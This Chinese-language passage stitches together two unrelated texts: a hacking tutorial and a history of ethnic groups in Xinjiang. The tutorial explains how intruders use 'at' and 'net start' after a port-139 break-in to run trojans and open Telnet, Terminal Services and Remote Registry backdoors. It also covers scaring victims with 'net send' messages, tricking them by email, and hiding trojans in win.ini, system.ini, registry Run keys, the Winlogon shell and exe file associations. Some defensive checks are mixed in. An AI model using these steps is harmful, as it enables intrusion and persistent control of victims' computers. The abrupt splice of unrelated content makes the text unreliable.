:\work\temp\reboot.exeC:\>at查看任务计划是否有该项目C:\>at五分钟后查看任务计划是否还有该项目，已经没有了表示已经运行成功。若使用at命令时出现如下的信息【服务尚未启动】，就表示被黑者电脑中的TaskScheduler服务没有打开，所以不能用at命令。如果TaskScheduler服务没有打开，可利用net命令（netstartschedule），只是这个net命令要被黑者自己来打开（例如：电子邮件骗被黑者运行该命令），是否成功就是另一回事了。若能在被黑电脑中使用at命令，也就表示具有最高权限。此方法最大的缺点就是必须先成功地使用端口139直接入侵到被黑电脑中，而且具有最高权限才可使用at命令。而且此方法只适用于WinVista，WinXP和Win2k，而Win9x与WinME的电脑是不可用的。防护方法：1.防止黑客直接入侵2.关闭TaskScheduler服务【关闭任务计划器】（1）在【控制面板】中，找到【任务计划】。在【添加任务计划】中查看这里是否有排定工作，若无需要可按下Delete删除。在WinVista中，该项不能删除。（2）在【管理工具】中找到【服务】，再找到【TaskScheduler】禁用就可以。由于任务计划MSTask.exe是系统的重要文件，因此不可以删除，所以你最好经常查看任务计划服务是否有被打开，若有则关闭它。4.使用net命令如果木马被设计成系统服务（systemservice）的方式，则通常使用下列几种方法来在被黑电脑中运行：木马本身是程序文件，在被黑电脑中运行后就转换成以系统服务方式运作。利用木马帮凶工具或批处理文件来运行利用端口139或漏洞直接入侵被黑电脑后，使用net命令来启动木马。使用端口139入侵当利用端口139入侵到被黑电脑后，由于并非终端机登录操作，因此无法直接使用net命令（否则一运行就是在黑客自己的电脑中run，那不是自己黑自己），仍然必须借助at命令来运行net命令。c：\>nettime由于对方电脑时间不一定与你的相同，所以输入nettime\\被黑电脑IP，查看时间。C:\>at20:34?????设置该电脑20：34运行？？？？？木马程序。若出现新加了一项作业，表示成功。？？？？？是要运行的程序名，若在Windows系统文件中就输入名称即可，否则要输入所在磁盘与详细路径。例如：Windows或系统文件夹中的system32下，则直接输入该程序名即可。若在其他文件夹中就必须指明所在磁盘与详细路径才行，例如要运行e:\work\temp\reboot.exeC:\>at查看任务计划是否有该项目C:\>at五分钟后查看任务计划是否还有该项目，已经没有了表示已经运行成功。使用漏洞入侵虽然漏洞的入侵方法很多，但一般最常见的就是使用远程缓冲区溢出漏洞成功打开后门后，再使用Telnet入侵，如此就等于直接操作被黑电脑一样（等于终端机登录操作）。所以可以直接使用net命令来加载与启动被黑者电脑中的木马。利用漏洞直接入侵后，再运行net命令来加载被黑电脑中的木马，不过在此之前，必须先将木马上传到被黑电脑中却不太容易。如果可以使用net命令，那么就可以做很多事。如：netstarttelnet(打开Telnet服务，也就是打开Telnet后门)，netstarttermservice(打开Windows终端机服务，也打开一个后门)，netstartRomoteRegistry(打开远程注册表服务，黑客就可以修改与删除注册表值)。此方法的缺点是必须直接入侵到被黑电脑中才能运行，而且只能适于Windowsvista，Windowsxp和Windows2k。—————————————————————————恐吓被黑者重启的—————————————————————————受影响的环境与版本：WinXP，Win2k，WinME，Win9x当黑客已经成功地将木马植入被黑电脑中而且设置了每次启动进入Windows就会自动运行，但是使用许多方法就是无法让木马运行，这时黑客要怎么办呢？早些年，黑客利用Windows或winsock的漏洞来对被黑电脑进行死机攻击，如此肯定要重启的，不过现在这类漏洞多已修补，死机攻击当然也就不会成功（或许未来有新的漏洞可进行死机攻击也不一定）。1.发送恐吓信息给被黑者使用Windows系统提供的netsend这个命令，然后对被黑电脑的IP地址发送出去，只要使用WinXP，Win2k或WinNT的电脑都会收到并自动显示出来（因为系统默认打开Messenger服务，不过WinVista已经无此服务），而Win9x与WinME的电脑则要打开winpopup程序才会收到此信息。在winvista中已不提供messenger服务，而在net命令中也没有send参数（不可用send发送信息），也就是说被黑电脑若使用winvista就不会收到这种恶意信息，而黑客电脑若使用winvista也不可用send命令发送恶意信息。步骤如下：1.获取被黑电脑IP地址2.更改计算机名由于在信息中会显示出发信者的计算机名，所以黑客会先更改自己的计算机名来达到吓唬被黑者的目标，例如国际黑客组织等名称。以下winxp操作来说明我的电脑-属性-更改-计算机名（或工作组，因为在internet上大部分电脑都使用WORKGROUP工作组，因此没必要更改）。3.发送信息黑客现在就可以发送信息给被黑电脑，netsend命令使用方法，要进入DOS窗口中发送。失败原因可能是网络拥塞或对方电脑使用拨号上网，造成超时(TimeOut)，所以重复多传几次可能就成功了。防护方法关闭Messenger服务，这样就不会再出现讨厌的信息了。运行【控制面板】-【服务】-【Messenger服务】停止或启的。—————————————————————————设置木马自动运行—————————————————————————许多木马都需要长期潜伏在被黑电脑中，而大多数电脑每天（或是多天后）几乎都一定会关闭系统（服务器就比较少或不会），因此就有必要设置每天启动进入Windows就会自动运行木马。设置方法：1.木马本身不需要如Sub7或OptixPRO的服务器程序2.木马捆绑器如果黑客是使用木马捆绑器来协助木马植入被黑电脑中与运行，则许多木马捆绑器也都能帮木马设置一进入Windows就自动运行（通常在注册表中），但是几乎所有的木马捆绑器都会被大多数杀毒软件查杀，所以最好经常更新病毒库。3.木马帮凶工具若黑客是自己设计木马帮凶工具来协助木马植入被黑电脑中与运行，则当然也可设计一进入Windows就自动运行（通常设计在注册表中）。这种黑客工具很难被杀毒软件查杀，所以最好的防护方法就是完全拒绝运行任何邮件中的exe文件，不接受任何人传来的exe文件，不下载任何人所给的exe下载地址。4.黑客自己设置如果黑客是直接入侵（139入侵，远程漏洞入侵）被黑电脑中植入木马，就有机会自己设置一进入Windows就自动运行。例如使用注册表编辑器远程设置，运行注册表项文件来完成，不过通常需要具有最高权限才行。5.使用注册表项文件（.reg）这个方法一般是黑客最后才使用的，黑客邮寄自动运行登录文件（reg）给被黑者，骗被黑者运行它来达到自动运行的目标。自动启动的木马藏匿之处1.启动或startup文件夹只要将木马复制到【启动】或【startup】文件夹中可以了。因此，这种木马很容易被杀毒软件查杀。删除木马，只要【开始】-【程序】-查看【启动】或【startup】就可以发现是否有木马存在。Win.ini是很多黑客的最爱，因为许多Windows用户都不会注意到它。黑客进入被黑电脑后，可使用记事本将win.ini读进来（它在Windows系统所在的文件夹，如C:\windows\win.ini或C:\winnnt\win.ini），[windows]Load=c:\windows\server.exe可以把木马的详细路径设置在这[灰色处为木马的程序]Nullport=noneRun=c:\windows\server.exe也可以把木马的详细路径设置在此[灰色处为木马的程序]Swapmousebuttons=no这样以后每次启动进入Windows就会自动运行该木马程序。防护方法[windows]Load=wpsload.exec:\windows\lmouse\lbuttons.exe这个load参数运行两个程序，一个是wpsload.exe，另一个是lbuttons.exe，中间以一个空格隔开。Nullport=noneRun=这个run参数没有运行任何程序Swapmousebuttons=no一般而言，现在大多数情况下并不会有run或load参数配置或者是空值，若有指定某个程序，则90%可能是木马程序或病毒。在system.ini中也能设置自动运行程序，让它可以设置每次进入Windows就自动运行，所以当黑客入侵被黑电脑中时，可使用记事本将system.ini读进来后（它在Windows系统所在的文件夹中，例如C:\windows\system.ini或C:\winnnt\system.ini），在[boot]区间中进行如下的设置：[boot]Shell=Explorer.exec:\windows\server.exe这是要求资源管理器运行木马程序，灰色区为所运行的木马程序与所在路径。Shell为资源管理器的运行程序如此每次一进入Windows时就会自动运行资源管理器，而资源管理器也会自动去运行server.exe程序，这样就达到加载木马的木的。防护方法使用记事本将system.ini读进来之后，查看[boot]区间的shell参数，如果除了Explorer.exe，还有其他程序启动，则99%的这个程序就是木马病毒程序，因为几乎没有任何的程序或应用软件会做这样的设置。4.注册表（Registry）几乎所有的木马程序的自动运行都是设置在注册表的某个项目中，对于大多数一般电脑用户而言也是最不容易找到之处，因为注册表是许多用户都不愿或不敢触碰的地方，所以木马隐藏起来比较合适。自动运行项这是一般最常见的项，也是许多对注册表了解的Windows用户所熟知的地方，就是下列这些项：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceExHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices(win9x与winME才有)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce(win9x与winME才有)HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\RunOnce我们可以使用startup这个免费的小工具来查看，而不必使用注册表编辑器（Regedit.exe）。当Windows系统安装好之后会设置自动运行的程序大多位于以下两个项目：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Run在这两个项中，通常包含下列几个程序：Internat.exescanregw.exeSysTray.exetaskmon.exesage.exeRundll32.exemstask.exeMSASCui.exe（并非每个都有，依Windows版本不同而有所不同）判断方法1.由程序文件所在的路径来判断如果某个运行项目文件并不在任何已安装软件的目录下，或是根本没有路径（也就是默认在Windows系统目录中或更下层的system32文件夹中，例如C:\WINDOWS，C:\windows\system32），但却不是属于上述Windows系统运行的程序，则可能就是有问题的不速之客。2.由文件内容来判断如果某个程序文件虽然位于某个已安装软件的目录中，但是你仍然有所怀疑的话，那么就找到那个文件，然后查看它的设计公司是否就是该安装软件的公司，如果不是而且也不属于Microsoft公司设计的，则很可能就大有问题。步骤如下：右击【属性】-【详细信息】查看该软件的详细信息3.询问原设计公司由于上面两项判断的数据都可以假造，所以某个木马病毒伪装存放在某个应用程序目录或Windows系统目录就很难判断了。

Rundll32的研究与讨论黑客将木马，恶意或间谍程序，傀儡程序或僵尸程序，后门程序，跳板程序，病毒等设计成DLL文件（非一般的exe文件），然后调用Rundll32来运行它。自动加载运行的DLL文件某些黑客可能会把木马设计成DLL或VXD的形式，然后利用一进入Windows系统自动加载驱动程序的方式来运行。目前虽然不多，但该方式已经出现了。因此为了能够有效地查找与摧毁这类木马病毒，被黑者必须彻底查看一下加载各类驱动程序的项，如下：HKEY_LOCAL_MACHINE\SYSTEM\controlset001\servicesHKEY_LOCAL_MACHINE\SYSTEM\controlset002\servicesHKEY_LOCAL_MACHINE\SYSTEM\controlset003\servicesHKEY_LOCAL_MACHINE\SYSTEM\currentcontrolset\servicesHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon找到每一个元素，然后查找每个元素的每一项里的每一个属性的值。注：在winlogon项中是不应该载入任何DLL程序的如果你真的对某一项不确定，可将该项导出保存；然后删除该项，万一删错了就再导入该项。运行其他程序时一并执行HKEY_CLASSES_ROOT\exefile\shell\open\command@=”\”%1\”%*”这个@=”\”%1\”%*”是一般正常的值，如果有一个程序文件，例如：@=”server.exe\”%1”%*”虽然这类木马不会立刻运行，但是只要被黑者运行任何程序或控制面板中的项目，木马就会运行，因此并不需要等太久。防护方法：先打开注册表编辑器查看上述项值，记下那个木马（或病毒）的名称，然后步骤如下：1.回复正常项运行back_exe.reg将该项恢复正常，千万不要删除，否则一般正常的exe程序文件就无法运行。2.删除正在运行的木马病毒程序再使用taskinfo将正在运行的木马终止运行。使用【搜索】在磁盘中查找前面记下的木马文件名，只要找到就全部删除。登录时自动运行在Windows中有很多鲜为人知的注册表项目可设置一进入Windows或登录时就自动运行，如下：HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\Explorer\Run1=”c:\server1.exe”2=”c:\server2.exe”3=”c:\server3.exe”4=”c:\server4.exe”可设置多个自动运行的程序（需指明详细路径）HKEY_CURRENT_USER\software\microsoft\windowsNT\currentversion\windowsload=c:\server.exe设置自动运行的程序（需指明详细的路径）与shell一起运行在注册表中有一个特殊的项，它是指定当Windows系统启动进入桌面时就运行的shell程序，也就是类似system.ini中的shell参数。HEKY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinlogonShell=explorer.exe这个值应该是explorer.exe不过黑客可以在explorer.exe后面加上要运行的木马程序，如此就可以在一进入Windows时就自动被运行木马。Shell=explorer.exec:\winnt\server.exe中间为一个空格其他的自动运行HEKY_USERS\S-1-5-21-1275210071-152049171-1060284298-1000[这个数字项每一个用户的都不一样]\Software\Microsoft\windowsNT\currentversion\windowsRun=”server.exe”木马详细地址设置地点因为该项有一段数字在不同电脑与不同用户中都不相同，因此除非木马本身有此功能设置在里面。一般安装生成工具是不能调用API函数的，因此无法设计在此项目中自动运行木马。与某个文件关联这类的木马必须要木马或帮凶工具写编程才行。也就是说，当木马被运行时就先获取某类文件（.txt）的关联程序（notepad.exe），然后设置木马自己为该类文件的关联程序，当被黑者要打开该类文件时会先运行木马，然后木马再调用原来那个关联程序来打开该类文件。只要打开该类文件，就会运行木马程序。防护方法要防护木马或病毒利用文件关联来启动并不难，只要经常查看你常使用某些类型的文件，看看是否有异常的关联程序，操作如下：在要查看的类别文件上单击鼠标右键，找到【打开方式】；然后查看这个文件的打开方式里是否有可疑的打开方式。如果有，找到它，并删除该文件。————————————5.系统服务（systemservice）6.替换系统文件

新疆古今民族历史演变新疆维吾尔自治区位于中国西北边陲，东连甘肃、青海两省，南隔昆仑山与西藏相接，东北与蒙古国接壤，北邻俄罗斯，西北邻哈萨克斯坦，西邻吉尔吉斯斯坦、塔吉克斯坦、阿富汗，西南邻巴基斯坦。这个地区古称“西域”，茫茫沙海簇拥着绿洲走廓，蜿蜒地连接着欧亚大陆，东来西往的人们都要穿越此地，不同的族群在这里留居、繁衍、交融。史实表明，新疆自古以来就是一个多部族聚居的地区。古今民族在历史进程中发生了很大的变化，许多古代族群的语言、宗教及族名消失了，而其血统却在一批批新的族群中得到延续。目前友好共存的13个世纪居民族是数千年来人种更替和部族分化、融合、重组、再融合，复杂演变的历史产物。考古发现和人类学研究成果表明，新疆远古的族群结构主要存在印欧型白色人种的塞人（Saka）、蒙古利亚型黄色人种的羌人，以及介于这两者之间的混合型人种等三支古老居民。起初在新疆占重要地位的是操原始汉藏语语言的羌人。从考古发现看，新疆出土了中国东海特产的环形贝，河南殷墟商代（约前17世纪—约前11世纪）后期奴隶主贵族墓葬妇好墓中则出土了新疆和田玉，这是新疆的羌人曾以玉贝交换的形式同内地建立过联系的历史见证。据中国史书《穆天子传》中记载，公元前989年至公元前985年，周穆王西巡时所访的赤乌、容成、甄韩、西王母、寿余、诸干等部，都与周朝时期内地人的语言大体相通。这些部族大约都属羌人。到了公元2世纪，原来在新疆民族构成中占据重要地位的羌人日益退居次要地位，白色人种中操印欧系语言的塞人成为西域历史舞台的主角。他们将原产于中原的美丽丝绸转贩至西方，由此而得名的丝绸之路也成为最早联系东方的欧亚大陆桥。西方人称丝绸为“seres"，而“丝国人”（seris，汉语译作“赛里斯”）是西方最早对新疆塞人的称呼，继而又用这一称谓来统称中国人。至于混血型人种，则是这两个人种相互交融的结果。频繁的玉贝交换演变为繁盛的丝绸贸易，进一步加强了内地同新疆的紧密联系。公元前119年至公元前115年，西汉（前206—25年）使者张骞出使西域成功，使中原中央政权初步建立起同西域诸国间的全面联系，并开辟了闻名世界的丝绸之路，从而揭开了西域归汉的历史序幕。公元前60年，西汉政府所设西域都护府成立，标志着新疆正式纳入中国版图。从西汉起，中国史书对于西域族群的记载更为明晰了，当时“西域三十六国”人的体质特征仍然大体分为“高鼻、深目、多须”的塞人、“貌不甚胡，颇类华夏”的羌人和黄、白混合型三类人。稍后，西域又增加了操蒙古—通古斯语族、属蒙古利亚种北支的匈奴。而随着西汉王朝派驻的西域都护和戊已校尉的建立，汉人也加入了新疆各民族的大家庭。在经济生活上，当时的西域人又南北有别。天山以北的广阔草原主要是游牧强族的生息之地，史称“行国”。这片土地的主人先是匈奴（公元前2世纪—公元2世纪）、北匈奴，而后是鲜卑、柔然，这些都是属于操阿尔泰语系原始满、蒙语的部族；此后，突厥兴起，操突厥语的部族逐渐占据统治地位，其间一度出现了契丹所建立的西辽帝国；至13世纪蒙古崛起，天山北麓又成为蒙古族游牧地，先后兴亡了察合台汗国、东察合台汗国以及由卫拉特蒙古所建立的准噶尔汗国（1634—1755）。所以，直到清朝（1644—1911）初年，人们仍称天山以北的广大地区为“准部”。天山以南则一直是定居在那里的部族建立的诸多城邦，史称“城郭诸国”。创建城邦文化的操印欧语系东伊朗语族的塞种诸支通过兼并在绿洲中建起五大主要城邦：龟兹、焉耆、于阗、疏勒、鄯善，并出现了记录自身语言的文字。如流行于焉耆、库车绿洲的A型吐火罗语和B型吐火罗语，流行于楼兰与和田的佉卢文，流行于和田的于阗塞语等。这一时期是新疆操印欧系语言诸族群的文化全盛时期。天山东段的吐鲁番、哈密绿洲，即古高昌、伊吾一带，则成为汉人的新家园。公元327年，汉人政权前凉在此创立了高昌郡，继而发展成高昌国，唐朝（618—907）改置西州，直至公元803年陷没。吐鲁番阿斯塔那遗址发现的大量汉人遗物证明，那一时期，今吐鲁番、哈密地区曾是汉人的聚居点。

塔吉克族牧羊女

新疆吐鲁番农村的维吾尔族老人唐朝推行“汉、蕃分治”政策，在政治上有效地对新疆行使了主权。天山北麓是突厥人的传统牧区，天山南麓是操印欧系语言诸族管理本城邦，羌人、蒙古—通古斯诸族的势力已全面衰弱，汉族的人口则有所增长，并由吐鲁番盆地向天山北麓东段扩展，集中于西州（今吐鲁番）、庭州（今吉木萨尔至昌吉）、伊州（今哈密至巴里伸）等地。此时，新疆在丝绸之路特殊的地理位置，使之成为东西文化的交汇点和往来的中转站，波斯的祆教、其中佛教尤为兴盛，凿崖而成的克孜尔千佛洞、库木吐拉千佛洞，以及地面佛教建筑龟兹的昭怙厘大寺、于阗的大寺都是这一时期形成的。这些古迹、文物已成为古代西域多元化文化共存的历史见证。以公元9世纪40年代回鹘人从兴安岭以西、阿尔泰山以东的旧辖地西迁为契机，古代西域的族群结构逐渐发生改变。回鹘西迁的第一站是天山北麓的吐鲁番盆地，先与葛逻禄等其它操突厥语诸部结合起来，继而又进入天山以南地区，改游牧为定居，与南疆各地的不同定居族群融合在一起，作为突厥语族一支的回鹘语逐渐上升为这一地区的统治语言。与此大体同时，伊斯兰教由建在喀什的喀喇汗朝逐步同东传播。13世纪，随着蒙古统一西域、中原的历史巨变，蒙古族加入到新疆多民族行列。蒙古成吉思汗的次子察合台（？—1241）建立的察合台汗国（辖天山南、北麓及阿姆河以东地区）分为东西两部，东察合台汗国家逐渐改用突厥语，秃黑帖木儿汗统治时期改宗了伊斯兰教，还以武力将伊斯兰教推行到库车一带，使伊斯兰教取代了佛教。至叶尔羌汗国时期，今天山南麓诸城邦大体实现了突厥语化和伊斯兰化，这已是现代维吾尔民族形成的前夜了。现代哈萨克、柯尔克孜、乌孜别克、塔吉克、塔塔尔等操突厥语诸民族也大体形成于这一时期。可见，民族的演变绝不是从古到今某一部族一脉相承的简单延续，而是经历了血统上民族融合、体质特征不断变异的漫长过程，直到近代意义民族的正式形成。史实表明，突厥语化、伊斯兰化并未改变新疆多元文化、多族共存的历史格局。17世纪中叶，蒙古处于分裂割据状态，以蒙古高原为界，分为漠南蒙古、漠北蒙古和漠西蒙古三部分，漠西蒙古又称卫拉特蒙古，是准噶尔部、杜尔伯特部、土尔扈特部、和硕特部四部组成的联盟。其中，准噶尔部原游牧于天山北麓塔尔巴哈台东和博克河、萨里山一带，后以伊犁为中心，吞并卫拉特其余三部，势力达到天山南